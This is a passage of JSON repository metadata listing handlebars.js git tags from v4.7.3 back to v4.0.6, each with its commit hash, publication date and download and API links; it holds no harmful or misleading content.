.7.3/manifests"},{"name":"v4.7.2","sha":"586e672c8bba7db787bc9bfe9a9fde4ec98d5b4f","kind":"tag","published_at":"2020-01-13T20:53:16.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.2/manifests"},{"name":"v4.7.1","sha":"14ba3d0c43d75bcfcdbfb7c95c9fac99d88a17c8","kind":"tag","published_at":"2020-01-12T12:21:10.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.1/manifests"},{"name":"v4.7.0","sha":"0d5c807017f8ba6c6d947f9d6852033c8faa2e49","kind":"tag","published_at":"2020-01-10T16:24:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.7.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"91a1b5d2f456cb733cbd88149fc9270973db79d7","kind":"tag","published_at":"2020-01-08T22:45:17.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.6.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.6.0/manifests"},{"name":"v4.5.3","sha":"c819c8b533934d2ac18001d7eb27a3205b00c2f3","kind":"tag","published_at":"2019-11-18T07:10:26.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.3/manifests"},{"name":"v4.5.2","sha":"8de121d21c88a6ab877e3a0eec9daaac483f3bf0","kind":"tag","published_at":"2019-11-13T21:07:27.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.2/manifests"},{"name":"v4.5.1","sha":"7ef86173abb446cf564ad6dc2646a4c361e2ab9f","kind":"tag","published_at":"2019-10-29T04:42:23.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.1/manifests"},{"name":"v4.5.0","sha":"b24797da01afd4e849fdb315dea8335792974522","kind":"tag","published_at":"2019-10-28T18:47:51.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.5.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.5.0/manifests"},{"name":"v4.4.5","sha":"8e1cce79186ab6caeb8c6ec9c1f8bcfa1a40e83d","kind":"tag","published_at":"2019-10-20T21:08:10.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.5/manifests"},{"name":"v4.4.4","sha":"2ab261eab7835e9c80ad1cb7ef9fc9b0f46d6a57","kind":"tag","published_at":"2019-10-20T19:33:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.4/manifests"},{"name":"v4.4.3","sha":"2e53fba68f8c51f9aca97615944fdbdeba94ff62","kind":"tag","published_at":"2019-10-08T20:05:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.3/manifests"},{"name":"v4.4.2","sha":"b793350fec0bb652c0bb2658089d7002af27a76b","kind":"tag","published_at":"2019-10-02T20:44:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.2/manifests"},{"name":"v4.2.2","sha":"0d5c691f36baae183349c51c47228da45278c50a","kind":"tag","published_at":"2019-10-02T20:12:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.2/manifests"},{"name":"v4.3.5","sha":"e96c1a5d86d8b2e8b152578fa37d5cdebc2964a3","kind":"tag","published_at":"2019-10-02T20:05:02.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.5/manifests"},{"name":"v4.4.1","sha":"b8e769fcb624664a6bc7114c8739c2438d46dbe9","kind":"tag","published_at":"2019-10-02T19:52:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"059b33057925ebda96536421cfc7c4c75e5c61e3","kind":"tag","published_at":"2019-09-29T13:29:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.0/manifests"},{"name":"v4.3.4","sha":"c958cc89550ca411a78fefa426b0acee80c702eb","kind":"tag","published_at":"2019-09-28T11:25:05.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.4/manifests"},{"name":"v4.3.3","sha":"e4738491b3e8db97aa9b4f9967f04093ceba1a1f","kind":"tag","published_at":"2019-09-27T05:46:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.3/manifests"},{"name":"v4.3.2","sha":"2357140c68d17cb4f8ab74431e8737de6b4b39b5","kind":"tag","published_at":"2019-09-26T21:58:48.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.2/manifests"},{"name":"v4.3.1","sha":"050cca0866b3496852d9b198141807c32e4dae81","kind":"tag","published_at":"2019-09-24T22:32:32.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.1/manifests"},{"name":"v4.3.0","sha":"a89081d440a9da9f3f25835f47de837907b0094a","kind":"tag","published_at":"2019-09-24T06:04:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"fff3e40402c9f9cd790984560658646a26e1c930","kind":"tag","published_at":"2019-09-20T17:40:48.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"164c7ceea4ce074f70f2fefeba81e2e551757ea6","kind":"tag","published_at":"2019-09-03T19:58:07.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.0/manifests"},{"name":"v4.1.2-0","sha":"f98c6a54256fec0b36ae1adc4c36ab5412ca3b88","kind":"tag","published_at":"2019-08-25T16:06:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.2-0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.2-0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.1.2-0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2-0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2-0/manifests"},{"name":"v3.0.7","sha":"55e4d9d80d5dd834fcf53c528e7e0aa080f315a5","kind":"tag","published_at":"2019-06-30T08:53:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.7/manifests"},{"name":"v4.0.14","sha":"272362e44c66d0110a4c98c7c1d121971ce447a7","kind":"tag","published_at":"2019-04-13T14:39:19.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.14","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.14/manifests"},{"name":"v4.1.2","sha":"10b5fcf92e6f3ddcbcec93c05c00cfdbb2e8d303","kind":"tag","published_at":"2019-04-13T14:19:22.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"f691db546e7563e1db3437d5a72f478f9e556714","kind":"tag","published_at":"2019-03-16T21:28:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.1/manifests"},{"name":"v4.0.13","sha":"9d4fff19d438a390b4e34d0a175b2de5f196cea8","kind":"tag","published_at":"2019-02-07T10:26:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13/manifests"},{"name":"v4.1.0","sha":"7caca944b1ae64b5bc11cba67d21e4b51ba6196a","kind":"tag","published_at":"2019-02-07T09:46:32.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.0/manifests"},{"name":"v4.0.13-beta.0","sha":"616f8c6fdb8b4224e5ab742e0ae400cfbc74086f","kind":"tag","published_at":"2019-02-02T20:26:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13-beta.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.13-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-beta.0/manifests"},{"name":"v4.0.13-0","sha":"0e56659f7bc9d5060bf791d58fd57c5f9a82ae17","kind":"tag","published_at":"2019-02-02T20:25:22.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13-0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13-0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.13-0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-0/manifests"},{"name":"v3.0.6","sha":"5a427d2d2b7264a83ca6702fddf63a6c7ba281c4","kind":"tag","published_at":"2019-01-02T09:17:56.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"64254b604b9d7fdf76d40b9c6675326eb4bda42b","kind":"tag","published_at":"2018-12-15T13:16:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"698c8a93a4066937977503d338bcd3b90d5035ca","kind":"tag","published_at":"2018-12-15T12:55:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.4/manifests"},{"name":"v4.0.12","sha":"8d22e6f501dc0720fe0610bb4dab60cae18e7d20","kind":"tag","published_at":"2018-09-04T18:44:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.12","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.12/manifests"},{"name":"v4.0.11","sha":"1e954ddf3c3ec6d2318e1fadc5e03aaf065b2fbd","kind":"tag","published_at":"2017-10-17T20:52:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.11","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.11/manifests"},{"name":"v4.0.10","sha":"670ec6fafbf99986a70074a37f73d41bad60b083","kind":"tag","published_at":"2017-05-21T12:11:27.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.10","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.10/manifests"},{"name":"v4.0.9","sha":"5ec78a8c70ac674f39a8408e04d59bd40340f6fe","kind":"tag","published_at":"2017-05-21T11:39:05.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.9/manifests"},{"name":"v4.0.8","sha":"fed5818876ec325b2b48a61395fe0089bdda05e8","kind":"commit","published_at":"2017-05-02T20:55:44.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.8/manifests"},{"name":"v4.0.7","sha":"606fa55b0a2fab4b22b810a21fc9ae1fd5fd8430","kind":"tag","published_at":"2017-04-29T20:52:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.7/manifests"},{"name":"tmp-1252-backup","sha":"ee913e28bd34dc6e97f98a99f00b484195f72d6f","kind":"commit","published_at":"2017-01-02T09:13:49.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/tmp-1252-backup","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/tmp-1252-backup","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@tmp-1252-backup","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/tmp-1252-backup","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/tmp-1252-backup/manifests"},{"name":"v4.0.6","sha":"ad3037cf54132fc5f589134d3bef961a5f751973","kind":"commit","published_at":"2016-11-12T18:32:45.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.6","html_url":"https://github.com/handlebars-